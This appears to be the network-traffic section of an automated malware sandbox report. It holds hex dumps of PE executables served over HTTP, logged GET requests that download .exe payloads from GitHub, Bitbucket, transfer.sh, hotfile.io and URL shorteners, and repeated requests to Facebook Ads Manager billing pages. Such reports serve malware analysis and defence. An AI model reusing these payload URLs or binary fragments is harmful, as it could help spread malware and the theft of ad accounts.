00 00 00 04 00 00 00 00 00 00 00 00 c0 3a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 76 3a 00 53 00 00 00 00 80 3a 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 3a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 56 3a 00 00 20 00 00 00 58 3a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 04 00 00 00 80 3a 00 00 06 00 00 00 5a 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 3a 00 00 02 00 00 00 60 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 76 3a 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 60 3a 00 5c 15 00 00 03 00 00 00 01 00 00 06 a8 27 00 00 02 39 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Feb 2023 15:04:50 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 15 Feb 2023 14:48:51 GMTETag: "30a00-5f4be2db47513"Accept-Ranges: bytesContent-Length: 199168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd d7 5b 6a f9 b6 35 39 f9 b6 35 39 f9 b6 35 39 6a f8 ad 39 f8 b6 35 39 96 c0 ab 39 e0 b6 35 39 96 c0 9f 39 95 b6 35 39 f0 ce a6 39 fc b6 35 39 f9 b6 34 39 85 b6 35 39 96 c0 9e 39 dc b6 35 39 96 c0 af 39 f8 b6 35 39 96 c0 a8 39 f8 b6 35 39 52 69 63 68 f9 b6 35 39 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b3 14 12 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 5e 01 00 00 b6 14 00 00 00 00 00 99 83 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 16 00 00 04 00 00 ee 96 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 62 01 00 3c 00 00 00 00 b0 15 00 e8 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 42 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 5d 01 00 00 10 00 00 00 5e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 94 1e 14 00 00 70 01 00 00 38 01 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6a 61 76 00 00 00 00 05 00 00 00 00 90 15 00 00 02 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 75 74 75 00 00 00 00 04 00 00 00 a0 15 00 00 04 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 68 00 00 00 b0 15 00 00 6a 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Feb 2023 15:04:53 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Wed, 15 Feb 2023 15:00:03 GMTETag: "af800-5f4be55c01562"Accept-Ranges: bytesContent-Length: 718848Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd d7 5b 6a f9 b6 35 39 f9 b6 35 39 f9 b6 35 39 6a f8 ad 39 f8 b6 35 39 96 c0 ab 39 e0 b6 35 39 96 c0 9f 39 95 b6 35 39 f0 ce a6 39 fc b6 35 39 f9 b6 34 39 85 b6 35 39 96 c0 9e 39 dc b6 35 39 96 c0 af 39 f8 b6 35 39 96 c0 a8 39 f8 b6 35 39 52 69 63 68 f9 b6 35 39 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5d a8 88 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 5e 01 00 00 a6 1c 00 00 00 00 00 99 83 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 1e 00 00 04 00 00 49 75 0b 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 62 01 00 3c 00 00 00 00 a0 1d 00 e8 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 42 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 5d 01 00 00 10 00 00 00 5e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 14 0b 1c 00 00 70 01 00 00 26 09 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 69 78 6f 00 00 00 05 00 00 00 00 80 1d 00 00 02 00 00 00 88 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 6f 62 6f 00 00 00 00 04 00 00 00 90 1d 00 00 04 00 00 00 8a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 68 00 00 00 a0 1d 00 00 6a 00 00 00 8e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.2Date: Wed, 15 Feb 2023 15:05:27 GMTContent-Type: application/octet-streamContent-Length: 3826176Last-Modified: Wed, 15 Feb 2023 15:00:04 GMTConnection: keep-aliveETag: "63ecf374-3a6200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd d7 5b 6a f9 b6 35 39 f9 b6 35 39 f9 b6 35 39 6a f8 ad 39 f8 b6 35 39 96 c0 ab 39 e0 b6 35 39 96 c0 9f 39 95 b6 35 39 f0 ce a6 39 fc b6 35 39 f9 b6 34 39 85 b6 35 39 96 c0 9e 39 dc b6 35 39 96 c0 af 39 f8 b6 35 39 96 c0 a8 39 f8 b6 35 39 52 69 63 68 f9 b6 35 39 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8f be 39 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 5e 01 00 00 2e 4c 00 00 00 00 00 99 83 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 4f 00 00 04 00 00 2e 90 3a 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 62 01 00 3c 00 00 00 00 10 4d 00 e8 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 42 00 00 18 00 00 00 80 42 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 5d 01 00 00 10 00 00 00 5e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 54 75 4b 00 00 70 01 00 00 90 38 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6f 64 75 72 00 00 05 00 00 00 00 f0 4c 00 00 02 00 00 00 f2 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 69 6d 6f 6c 65 00 00 04 00 00 00 00 4d 00 00 04 00 00 00 f4 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 48 02 00 00 10 4d 00 00 6a 00 00 00 f8 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Feb 2023 15:05:36 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Mon, 13 Feb 2023 14:34:29 GMTETag: "51400-5f495beaee328"Accept-Ranges: bytesContent-Length: 332800Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c1 67 e2 1a 85 06 8c 49 85 06 8c 49 85 06 8c 49 16 48 14 49 84 06 8c 49 ea 70 12 49 9f 06 8c 49 ea 70 26 49 f7 06 8c 49 8c 7e 1f 49 80 06 8c 49 85 06 8d 49 f9 06 8c 49 ea 70 27 49 a0 06 8c 49 ea 70 16 49 84 06 8c 49 ea 70 11 49 84 06 8c 49 52 69 63 68 85 06 8c 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 53 0a 71 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 7a 01 00 00 a6 16 00 00 00 00 00 63 96 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 18 00 00 04 00 00 7d 81 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 7d 01 00 3c 00 00 00 00 c0 17 00 08 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 4f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b8 2c 16 00 00 90 01 00 00 46 03 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 4e 00 00 00 c0 17 00 00 50 00 00 00 c4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /systems/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: autoacores.com
    Source: global trafficHTTP traffic detected: GET /systems/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: beg.com.ve
    Source: global trafficHTTP traffic detected: GET /evgenfaraday/mytoy/raw/main/5454543.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
    Source: global trafficHTTP traffic detected: GET /hpINT HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shorturl.at
    Source: global trafficHTTP traffic detected: GET /hpINT HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.shorturl.at
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.shorturl.at
    Source: global trafficHTTP traffic detected: GET /3RaZ238 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bit.ly
    Source: global trafficHTTP traffic detected: GET /tollandrew/aboba/downloads/yaplakalkogdavieli.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
    Source: global trafficHTTP traffic detected: GET /%23/ HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ads-optimization-of-meta.web.app
    Source: global trafficHTTP traffic detected: GET /kdrbr1W2y7/916c52d4-1675638446/Xzswnwa.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-153.hotfile.io
    Source: global trafficHTTP traffic detected: GET /kdrbr1W2y7 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hotfile.io
    Source: global trafficHTTP traffic detected: GET /preterka/PreterHello/raw/main/QueenPars.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
    Source: global trafficHTTP traffic detected: GET /get/yVhGA8/app.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
    Source: global trafficHTTP traffic detected: GET /Japoi111/azazazd/blob/main/t5mu6zi.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
    Source: global trafficHTTP traffic detected: GET /5XqFyc/brazilx86.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
    Source: global trafficHTTP traffic detected: GET /media/smartbot.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: smartbot.dev
    Source: global trafficHTTP traffic detected: GET /2701.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
    Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
    Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
    Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
